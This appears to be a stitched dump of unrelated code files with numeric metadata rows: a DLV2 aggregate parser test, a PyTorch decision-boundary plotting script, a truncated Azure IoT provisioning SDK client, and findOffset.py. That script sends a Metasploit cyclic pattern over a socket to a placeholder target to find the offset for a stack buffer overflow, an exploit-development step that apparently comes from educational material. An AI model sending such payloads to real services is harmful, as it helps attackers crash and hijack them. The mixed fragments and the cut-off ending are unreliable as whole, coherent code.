| 350.794118 | 1,894 | 0.485789 | 2,982 | 11,927 | 1.900402 | 0.059356 | 0.045174 | 0.022587 | 0.017646 | 0.833951 | 0.816128 | 0.793542 | 0.773425 | 0.773425 | 0.768131 | 0 | 0.308044 | 0.027501 | 11,927 | 33 | 1,895 | 361.424242 | 0.180533 | 0.004444 | 0 | 0 | 1 | 0.612903 | 0.754803 | 0.717307 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
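The national_number_pattern fields above are ordinary regular expressions, so the stdlib re module can sanity-check a candidate national number against the general AR pattern (example numbers are the ones given in the metadata itself):

```python
import re

# general_desc national_number_pattern from the AR metadata above
AR_GENERAL = r'(?:11|(?:[2368]|9\d)\d)\d{8}'

def looks_like_ar_number(digits):
    # Full-match the national-number pattern; expects digits only,
    # with no national or international prefix.
    return re.fullmatch(AR_GENERAL, digits) is not None
```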
1e8091ad5c5d7d22fbb51931583371c3143e0414 | 10,023 | py | Python | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.min.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
% Aggregates defined into the body of rules, constraints and weak constraints.
% No model is computed as, at least the last strong constraint is always violated.
a(2).
a(3).
b.
c.
d.
p(1,2).
p(1,3).
p(1,4).
q(1,3).
r(1,2).
s(2,4).
t(3,4).
%---- #min{...} op var ----(at the end)
okay1(M, N) :- p(M, N), #min{V : a(V), b, c} = N.
okay2(M, N) :- p(M, N), #min{V : a(V), b, c} < N.
okay3(M, N) :- p(M, N), #min{V : a(V), b, c} <= N.
okay4(M, N) :- p(M, N), #min{V : a(V), b, c} > M.
okay5(M, N) :- p(M, N), #min{V : a(V), b, c} >= N.
:- p(M, N), #min{V : a(V), b, c} = M.
%:- p(M, N), #min{V : a(V), b, c} = M.
:- p(M, N), #min{V : a(V), b, c} < M.
%:- p(M, N), #min{V : a(V), b, c} < M.
:- p(M, N), #min{V : a(V), b, c} <= M.
%:- p(M, N), #min{V : a(V), b, c} <= M.
:- q(M, N), #min{V : a(V), b, c} > N.
%:- q(M, N), #min{V : a(V), b, c} > N.
:- q(M, N), #min{V : a(V), b, c} >= N.
%:- q(M, N), #min{V : a(V), b, c} >= N.
%---- #min{...} op var ----(at the beginning)
okay6(M, N) :- #min{V : a(V), b, c} = N, p(M, N).
okay7(M, N) :- #min{V : a(V), b, c} < N, p(M, N).
okay8(M, N) :- #min{V : a(V), b, c} <= N, p(M, N).
okay9(M, N) :- #min{V : a(V), b, c} > M, p(M, N).
okay10(M, N) :- #min{V : a(V), b, c} >= N, p(M, N).
:- #min{V : a(V), b, c} = N, q(M, N).
%:- #min{V : a(V), b, c} = N, q(M, N).
:- #min{V : a(V), b, c} < M, p(M, N).
%:- #min{V : a(V), b, c} < M, p(M, N).
:- #min{V : a(V), b, c} <= M, p(M, N).
%:- #min{V : a(V), b, c} <= M, p(M, N).
:- #min{V : a(V), b, c} > N, q(M, N).
%:- #min{V : a(V), b, c} > N, q(M, N).
:- #min{V : a(V), b, c} >= N, q(M, N).
%:- #min{V : a(V), b, c} >= N, q(M, N).
%---- var op #min{...}----(at the end)
okay11(M, N) :- p(M, N), N = #min{V : a(V), b, c}.
okay12(M, N) :- p(M, N), M < #min{V : a(V), b, c}.
okay13(M, N) :- p(M, N), N <= #min{V : a(V), b, c}.
okay14(M, N) :- p(M, N), N > #min{V : a(V), b, c}.
okay15(M, N) :- p(M, N), N >= #min{V : a(V), b, c}.
:- p(M, N), M = #min{V : a(V), b, c}.
%:- p(M, N), M = #min{V : a(V), b, c}.
:- q(M, N), N < #min{V : a(V), b, c}.
%:- q(M, N), N < #min{V : a(V), b, c}.
:- q(M, N), N <= #min{V : a(V), b, c}.
%:- q(M, N), N <= #min{V : a(V), b, c}.
:- p(M, N), M > #min{V : a(V), b, c}.
%:- p(M, N), M > #min{V : a(V), b, c}.
:- p(M, N), M >= #min{V : a(V), b, c}.
%:- p(M, N), M >= #min{V : a(V), b, c}.
%---- var op #min{...}---- (at the beginning)
okay16(M, N) :- N = #min{V : a(V), b, c}, p(M, N).
okay17(M, N) :- M < #min{V : a(V), b, c}, p(M, N).
okay18(M, N) :- N <= #min{V : a(V), b, c}, p(M, N).
okay19(M, N) :- N > #min{V : a(V), b, c}, p(M, N).
okay20(M, N) :- N >= #min{V : a(V), b, c}, p(M, N).
:- M = #min{V : a(V), b, c}, p(M, N).
%:- M = #min{V : a(V), b, c}, p(M, N).
:- N < #min{V : a(V), b, c}, q(M, N).
%:- N < #min{V : a(V), b, c}, q(M, N).
:- N <= #min{V : a(V), b, c}, q(M, N).
%:- N <= #min{V : a(V), b, c}, q(M, N).
:- M > #min{V : a(V), b, c}, p(M, N).
%:- M > #min{V : a(V), b, c}, p(M, N).
:- M >= #min{V : a(V), b, c}, p(M, N).
%:- M >= #min{V : a(V), b, c}, p(M, N).
%---- var < #min{...} < var ----
okay21(M, N) :- p(M, N), M < #min{V : a(V), b, c} < N.
okay22(M, N) :- M < #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M < #min{V : a(V), b, c} < N.
:- M < #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M < #min{V : a(V), b, c} < N.
%:- M < #min{V : a(V), b, c} < N, r(M, N).
%---- var < #min{...} <= var ----
okay23(M, N) :- q(M, N), M < #min{V : a(V), b, c} <= N.
okay24(M, N) :- M < #min{V : a(V), b, c} <= N, q(M, N).
:- s(M, N), M < #min{V : a(V), b, c} <= N.
:- M < #min{V : a(V), b, c} <= N, s(M, N).
%:- s(M, N), M < #min{V : a(V), b, c} <= N.
%:- M < #min{V : a(V), b, c} <= N, s(M, N).
%---- var <= #min{...} < var ----
okay25(M, N) :- p(M, N), M <= #min{V : a(V), b, c} < N.
okay26(M, N) :- M <= #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M <= #min{V : a(V), b, c} < N.
:- M <= #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M <= #min{V : a(V), b, c} < N.
%:- M <= #min{V : a(V), b, c} < N, r(M, N).
%---- var <= #min{...} <= var ----
okay27(M, N) :- s(M, N), M <= #min{V : a(V), b, c} <= N.
okay28(M, N) :- M <= #min{V : a(V), b, c} <= N, s(M, N).
:- t(M, N), M <= #min{V : a(V), b, c} <= N.
% The following constraint is always violated.
:- M <= #min{V : a(V), b, c} <= N, p(M, N).
%:- t(M, N), M <= #min{V : a(V), b, c} <= N.
%:- M <= #min{V : a(V), b, c} <= N, t(M, N).
"""
output = """
% Aggregates defined into the body of rules, constraints and weak constraints.
% No model is computed as, at least the last strong constraint is always violated.
a(2).
a(3).
b.
c.
d.
p(1,2).
p(1,3).
p(1,4).
q(1,3).
r(1,2).
s(2,4).
t(3,4).
%---- #min{...} op var ----(at the end)
okay1(M, N) :- p(M, N), #min{V : a(V), b, c} = N.
okay2(M, N) :- p(M, N), #min{V : a(V), b, c} < N.
okay3(M, N) :- p(M, N), #min{V : a(V), b, c} <= N.
okay4(M, N) :- p(M, N), #min{V : a(V), b, c} > M.
okay5(M, N) :- p(M, N), #min{V : a(V), b, c} >= N.
:- p(M, N), #min{V : a(V), b, c} = M.
%:- p(M, N), #min{V : a(V), b, c} = M.
:- p(M, N), #min{V : a(V), b, c} < M.
%:- p(M, N), #min{V : a(V), b, c} < M.
:- p(M, N), #min{V : a(V), b, c} <= M.
%:- p(M, N), #min{V : a(V), b, c} <= M.
:- q(M, N), #min{V : a(V), b, c} > N.
%:- q(M, N), #min{V : a(V), b, c} > N.
:- q(M, N), #min{V : a(V), b, c} >= N.
%:- q(M, N), #min{V : a(V), b, c} >= N.
%---- #min{...} op var ----(at the beginning)
okay6(M, N) :- #min{V : a(V), b, c} = N, p(M, N).
okay7(M, N) :- #min{V : a(V), b, c} < N, p(M, N).
okay8(M, N) :- #min{V : a(V), b, c} <= N, p(M, N).
okay9(M, N) :- #min{V : a(V), b, c} > M, p(M, N).
okay10(M, N) :- #min{V : a(V), b, c} >= N, p(M, N).
:- #min{V : a(V), b, c} = N, q(M, N).
%:- #min{V : a(V), b, c} = N, q(M, N).
:- #min{V : a(V), b, c} < M, p(M, N).
%:- #min{V : a(V), b, c} < M, p(M, N).
:- #min{V : a(V), b, c} <= M, p(M, N).
%:- #min{V : a(V), b, c} <= M, p(M, N).
:- #min{V : a(V), b, c} > N, q(M, N).
%:- #min{V : a(V), b, c} > N, q(M, N).
:- #min{V : a(V), b, c} >= N, q(M, N).
%:- #min{V : a(V), b, c} >= N, q(M, N).
%---- var op #min{...}----(at the end)
okay11(M, N) :- p(M, N), N = #min{V : a(V), b, c}.
okay12(M, N) :- p(M, N), M < #min{V : a(V), b, c}.
okay13(M, N) :- p(M, N), N <= #min{V : a(V), b, c}.
okay14(M, N) :- p(M, N), N > #min{V : a(V), b, c}.
okay15(M, N) :- p(M, N), N >= #min{V : a(V), b, c}.
:- p(M, N), M = #min{V : a(V), b, c}.
%:- p(M, N), M = #min{V : a(V), b, c}.
:- q(M, N), N < #min{V : a(V), b, c}.
%:- q(M, N), N < #min{V : a(V), b, c}.
:- q(M, N), N <= #min{V : a(V), b, c}.
%:- q(M, N), N <= #min{V : a(V), b, c}.
:- p(M, N), M > #min{V : a(V), b, c}.
%:- p(M, N), M > #min{V : a(V), b, c}.
:- p(M, N), M >= #min{V : a(V), b, c}.
%:- p(M, N), M >= #min{V : a(V), b, c}.
%---- var op #min{...}---- (at the beginning)
okay16(M, N) :- N = #min{V : a(V), b, c}, p(M, N).
okay17(M, N) :- M < #min{V : a(V), b, c}, p(M, N).
okay18(M, N) :- N <= #min{V : a(V), b, c}, p(M, N).
okay19(M, N) :- N > #min{V : a(V), b, c}, p(M, N).
okay20(M, N) :- N >= #min{V : a(V), b, c}, p(M, N).
:- M = #min{V : a(V), b, c}, p(M, N).
%:- M = #min{V : a(V), b, c}, p(M, N).
:- N < #min{V : a(V), b, c}, q(M, N).
%:- N < #min{V : a(V), b, c}, q(M, N).
:- N <= #min{V : a(V), b, c}, q(M, N).
%:- N <= #min{V : a(V), b, c}, q(M, N).
:- M > #min{V : a(V), b, c}, p(M, N).
%:- M > #min{V : a(V), b, c}, p(M, N).
:- M >= #min{V : a(V), b, c}, p(M, N).
%:- M >= #min{V : a(V), b, c}, p(M, N).
%---- var < #min{...} < var ----
okay21(M, N) :- p(M, N), M < #min{V : a(V), b, c} < N.
okay22(M, N) :- M < #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M < #min{V : a(V), b, c} < N.
:- M < #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M < #min{V : a(V), b, c} < N.
%:- M < #min{V : a(V), b, c} < N, r(M, N).
%---- var < #min{...} <= var ----
okay23(M, N) :- q(M, N), M < #min{V : a(V), b, c} <= N.
okay24(M, N) :- M < #min{V : a(V), b, c} <= N, q(M, N).
:- s(M, N), M < #min{V : a(V), b, c} <= N.
:- M < #min{V : a(V), b, c} <= N, s(M, N).
%:- s(M, N), M < #min{V : a(V), b, c} <= N.
%:- M < #min{V : a(V), b, c} <= N, s(M, N).
%---- var <= #min{...} < var ----
okay25(M, N) :- p(M, N), M <= #min{V : a(V), b, c} < N.
okay26(M, N) :- M <= #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M <= #min{V : a(V), b, c} < N.
:- M <= #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M <= #min{V : a(V), b, c} < N.
%:- M <= #min{V : a(V), b, c} < N, r(M, N).
%---- var <= #min{...} <= var ----
okay27(M, N) :- s(M, N), M <= #min{V : a(V), b, c} <= N.
okay28(M, N) :- M <= #min{V : a(V), b, c} <= N, s(M, N).
:- t(M, N), M <= #min{V : a(V), b, c} <= N.
% The following constraint is always violated.
:- M <= #min{V : a(V), b, c} <= N, p(M, N).
%:- t(M, N), M <= #min{V : a(V), b, c} <= N.
%:- M <= #min{V : a(V), b, c} <= N, t(M, N).
"""
| 24.870968 | 82 | 0.311184 | 2,088 | 10,023 | 1.493774 | 0.035441 | 0.143636 | 0.269317 | 0.323181 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0 | 0.01921 | 0.345605 | 10,023 | 402 | 83 | 24.932836 | 0.45632 | 0 | 0 | 0.990826 | 0 | 0.770642 | 0.996907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
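In this fixture the expected output mirrors the input (a parser round-trip test). A hypothetical harness for such input/output pairs might normalize whitespace before comparing:

```python
def normalize(program):
    # Strip surrounding whitespace and drop blank lines so cosmetic
    # differences do not fail a round-trip comparison.
    return [line.strip() for line in program.strip().splitlines() if line.strip()]

def round_trip_ok(input_text, output_text):
    return normalize(input_text) == normalize(output_text)
```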
1e84bfd72f88100735a19ef4c130c55369c93238 | 3,440 | py | Python | slides/03_machine_learning_models/neural_nets.py | data-psl/lectures2020 | 5239d4912eb087dcc0b5351df11bbfb0f74f4bc3 | [
"MIT"
] | 40 | 2020-08-26T07:52:34.000Z | 2022-03-27T18:56:08.000Z | slides/03_machine_learning_models/neural_nets.py | pierreablin/pierreablin.github.io | e10d8af9ba916ca5ade68f4fffe35b00d00c7e89 | [
"MIT"
] | null | null | null | slides/03_machine_learning_models/neural_nets.py | pierreablin/pierreablin.github.io | e10d8af9ba916ca5ade68f4fffe35b00d00c7e89 | [
"MIT"
] | 17 | 2020-08-30T02:21:33.000Z | 2021-09-30T02:08:01.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.nn import Sequential
import matplotlib.pyplot as plt
n_hidden = 4
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(), nn.Linear(n_hidden, 2))
nn2 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, 2))
n = 1000
n_points = 10
t = np.linspace(0, 2 * np.pi, n_points, endpoint=False)
c = np.array([(np.cos(t_), np.sin(t_)) for t_ in t])
y = np.arange(n_points) % 2
X = np.concatenate([0.1 * np.random.randn(n, 2) + c_ for c_ in c])
y = np.concatenate([y_ * np.ones(n) for y_ in y])
X = torch.tensor(X).float()
y = torch.tensor(y).long()
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
plt.savefig('images/nn.png', dpi=200)
for n_hidden in [2, 3, 4, 5, 6]:
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, 2 * n_hidden), nn.Tanh(),
nn.Linear(2 * n_hidden, 2))
optimizer = optim.Adam(nn1.parameters(), lr=1e-2)
criterion = nn.CrossEntropyLoss()
for i in range(1001):
optimizer.zero_grad()
pred = nn1(X)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
if i % 100 == 0:
print(loss.item())
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
xx, yy = np.meshgrid(np.linspace(-1.5, 1.5),
np.linspace(-1.5, 1.5))
data = torch.tensor(np.c_[xx.ravel(), yy.ravel()]).float()
op = nn1(data).detach()
z = op.numpy().argmax(axis=1)
Z = z.reshape(xx.shape)
plt.contourf(xx, yy, Z, levels=1, alpha=0.5, colors=['b', 'orange'])
plt.savefig('images/nn_two_%s.png' % n_hidden, dpi=200)
for n_hidden in [2, 3, 4, 5, 6]:
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(), nn.Linear(n_hidden, 2))
optimizer = optim.Adam(nn1.parameters(), lr=1e-2)
criterion = nn.CrossEntropyLoss()
for i in range(1001):
optimizer.zero_grad()
pred = nn1(X)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
if i % 100 == 0:
print(loss.item())
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
xx, yy = np.meshgrid(np.linspace(-1.5, 1.5),
np.linspace(-1.5, 1.5))
data = torch.tensor(np.c_[xx.ravel(), yy.ravel()]).float()
op = nn1(data).detach()
z = op.numpy().argmax(axis=1)
Z = z.reshape(xx.shape)
plt.contourf(xx, yy, Z, levels=1, alpha=0.5, colors=['b', 'orange'])
plt.savefig('images/nn_one_%s.png' % n_hidden, dpi=200)
| 29.655172 | 79 | 0.56657 | 589 | 3,440 | 3.229202 | 0.191851 | 0.062566 | 0.011041 | 0.014721 | 0.813354 | 0.812829 | 0.798107 | 0.787592 | 0.787592 | 0.787592 | 0 | 0.053016 | 0.243314 | 3,440 | 115 | 80 | 29.913043 | 0.67768 | 0 | 0 | 0.739583 | 0 | 0 | 0.031686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
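The `contourf` step in the neural-network file above evaluates the trained model on a dense meshgrid and colors each grid point by its argmax class. A minimal numpy-only sketch of that meshgrid-argmax pattern, with a hypothetical linear scorer standing in for the trained `nn1`:

```python
import numpy as np

def decision_regions(score_fn, lim=1.5, n=50):
    # Build a dense grid over [-lim, lim]^2, exactly like the contourf step above.
    xx, yy = np.meshgrid(np.linspace(-lim, lim, n), np.linspace(-lim, lim, n))
    grid = np.c_[xx.ravel(), yy.ravel()]        # (n*n, 2) query points
    scores = score_fn(grid)                      # (n*n, n_classes) raw scores
    Z = scores.argmax(axis=1).reshape(xx.shape)  # per-pixel predicted class
    return xx, yy, Z

# Hypothetical stand-in for the trained network: class 1 iff x + y > 0.
linear = lambda X: np.stack([-X.sum(axis=1), X.sum(axis=1)], axis=1)
xx, yy, Z = decision_regions(linear)
```

The returned `xx, yy, Z` triple can be passed straight to `plt.contourf(xx, yy, Z, ...)` as in the file above; swapping `linear` for a `score_fn` that wraps a trained network reproduces the saved decision-boundary figures.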
1ed814d7747031aba2af51bf2a47802f56167df5 | 1,350 | py | Python | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys, socket
#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("Machine IP", 9999))
  s.send((pattern + "\r\n").encode())
s.close()
except:
  print("Error connecting to server")
sys.exit()
| 64.285714 | 1,036 | 0.925185 | 50 | 1,350 | 24.92 | 0.78 | 0.019262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.268255 | 0.036296 | 1,350 | 20 | 1,037 | 67.5 | 0.68947 | 0.067407 | 0 | 0 | 0 | 0 | 0.84646 | 0.814638 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
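The script above sends a non-repeating cyclic pattern; after the crash, the four pattern bytes that landed in EIP identify the overwrite offset. A hedged sketch of that lookup, reimplementing the pattern sequence in Python on the assumption that it follows the standard upper/lower/digit algorithm used by `pattern_create.rb`:

```python
import struct

def cyclic_pattern(length):
    """Generate the Aa0Aa1... upper/lower/digit cyclic pattern."""
    triplets = []
    for upper in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in "abcdefghijklmnopqrstuvwxyz":
            for digit in "0123456789":
                triplets.append(upper + lower + digit)
                if len(triplets) * 3 >= length:
                    return "".join(triplets)[:length]
    return "".join(triplets)[:length]

def find_offset(eip_value, length=1024):
    """Map a crashed EIP (little-endian dword) back to its pattern offset."""
    needle = struct.pack("<I", eip_value).decode("ascii")
    return cyclic_pattern(length).find(needle)
```

For example, if the debugger reports EIP as the dword spelled by the bytes `a1Aa`, `find_offset` returns 4, the index of that substring in the pattern (the same answer `pattern_offset.rb` would give).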
949fd8e24bfe55dd9b779224c5dfc0f916401b55 | 44,199 | py | Python | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class IotDpsResourceOperations(object):
"""IotDpsResourceOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The version of the API. Constant value: "2017-11-15".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-15"
self.config = config
def get(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get the non-security related metadata of the provisioning service.
Get the metadata of the provisioning service without SAS keys.
:param provisioning_service_name: Name of the provisioning service to
retrieve.
:type provisioning_service_name: str
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ProvisioningServiceDescription or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def _create_or_update_initial(
self, resource_group_name, provisioning_service_name, iot_dps_description, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
